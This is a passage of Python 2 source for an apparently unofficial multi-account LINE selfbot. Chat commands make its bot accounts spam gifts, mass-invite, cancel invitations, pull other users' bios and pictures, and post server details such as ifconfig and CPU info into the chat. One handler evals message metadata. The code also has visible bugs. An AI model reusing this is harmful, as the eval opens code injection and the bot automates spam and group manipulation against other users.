midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'contact bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#=======================================================
elif msg.text in ["You"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg)
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to,"add bossque")
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME', 'MSGTPL': '10'}
msg.text = None
cl.dendMessage(msg,g)
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif msg.text.lower() == 'allbio:':
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "My name:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("My name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'runtime':
if msg.from_ in admin:
eltime = time.time()
van = "Bot has been running for "+waktu(eltime)
cl.sendText(msg.to,van)
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#elif 'instagram ' in msg.text.lower():
# try:
# instagram = msg.text.lower().replace("instagram ","")
# html = requests.get('https://www.instagram.com/' + instagram + '/?')
# soup = BeautifulSoup(html.text, 'html5lib')
# data = soup.find_all('meta', attrs={'property':'og:description'})
# text = data[0].get('content').split()
# data1 = soup.find_all('meta', attrs={'property':'og:image'})
# text1 = data1[0].get('content').split()
# user = "Name: " + text[-2] + "\n"
# user1 = "Username: " + text[-1] + "\n"
# followers = "Followers: " + text[0] + "\n"
# following = "Following: " + text[2] + "\n"
# post = "Post: " + text[4] + "\n"
# link = "Link: " + "https://www.instagram.com/" + instagram
# detail = "========INSTAGRAM INFO USER========\n"
# details = "\n========INSTAGRAM INFO USER========"
# cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
# cl.sendImageWithURL(msg.to, text1[0])
# cl.sendText("Follow yak Fast Follback ")
# except Exception as njer:
# cl.sendText(msg.to, str(njer))
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.replace("instagram ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
text = detail + "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link + details
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
cl.sendText(msg.to,"Follow Fast Follback")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"════FROM ID════\n" + "" + kata + "\n════TO ENGLISH════\n" + "" + result + "\n══════SUKSES═════")
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
elif 'Creator' in msg.text.lower():
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"My Creator ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"succes add to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Succes remove admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
elif "Vn-af " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-af ","")
tts = gTTS(psn, lang='af', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sq " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sq ","")
tts = gTTS(psn, lang='sq', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ar " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ar ","")
tts = gTTS(psn, lang='ar', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hy ","")
tts = gTTS(psn, lang='hy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-bn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-bn ","")
tts = gTTS(psn, lang='bn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ca " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ca ","")
tts = gTTS(psn, lang='ca', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zh " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zh ","")
tts = gTTS(psn, lang='zh', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhcn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhcn ","")
tts = gTTS(psn, lang='zh-cn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhtw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhtw ","")
tts = gTTS(psn, lang='zh-tw', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhyue " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhyue ","")
tts = gTTS(psn, lang='zh-yue', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hr ","")
tts = gTTS(psn, lang='hr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cs " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cs ","")
tts = gTTS(psn, lang='cs', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-da " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-da ","")
tts = gTTS(psn, lang='da', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-nl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-nl ","")
tts = gTTS(psn, lang='nl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-en " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-en ","")
tts = gTTS(psn, lang='en', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enau " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enau ","")
tts = gTTS(psn, lang='en-au', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enuk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enuk ","")
tts = gTTS(psn, lang='en-uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enus ","")
tts = gTTS(psn, lang='en-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eo " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eo ","")
tts = gTTS(psn, lang='eo', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fi ","")
tts = gTTS(psn, lang='fi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fr ","")
tts = gTTS(psn, lang='fr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-de " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-de ","")
tts = gTTS(psn, lang='de', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-el " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-el ","")
tts = gTTS(psn, lang='el', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hi ","")
tts = gTTS(psn, lang='hi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hu " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hu ","")
tts = gTTS(psn, lang='hu', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-is " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-is ","")
tts = gTTS(psn, lang='is', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-id " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-id ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-it " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-it ","")
tts = gTTS(psn, lang='it', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-jp " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-jp ","")
tts = gTTS(psn, lang='ja', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-km " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-km ","")
tts = gTTS(psn, lang='km', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ko " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ko ","")
tts = gTTS(psn, lang='ko', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-la " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-la ","")
tts = gTTS(psn, lang='la', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-lv " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-lv ","")
tts = gTTS(psn, lang='lv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-mk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-mk ","")
tts = gTTS(psn, lang='mk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-no " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-no ","")
tts = gTTS(psn, lang='no', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pl ","")
tts = gTTS(psn, lang='pl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pt " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pt ","")
tts = gTTS(psn, lang='pt', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ro " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ro ","")
tts = gTTS(psn, lang='ro', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ru " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ru ","")
tts = gTTS(psn, lang='ru', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sr ","")
tts = gTTS(psn, lang='sr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-si " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-si ","")
tts = gTTS(psn, lang='si', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sk ","")
tts = gTTS(psn, lang='sk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-es " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-es ","")
tts = gTTS(psn, lang='es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eses " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eses ","")
tts = gTTS(psn, lang='es-es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-esus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-esus ","")
tts = gTTS(psn, lang='es-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sv ","")
tts = gTTS(psn, lang='sv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ta " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ta ","")
tts = gTTS(psn, lang='ta', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-th " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-th ","")
tts = gTTS(psn, lang='th', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-tr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-tr ","")
tts = gTTS(psn, lang='tr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-uk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-uk ","")
tts = gTTS(psn, lang='uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-vi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-vi ","")
tts = gTTS(psn, lang='vi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cy ","")
tts = gTTS(psn, lang='cy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#=======================================================
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
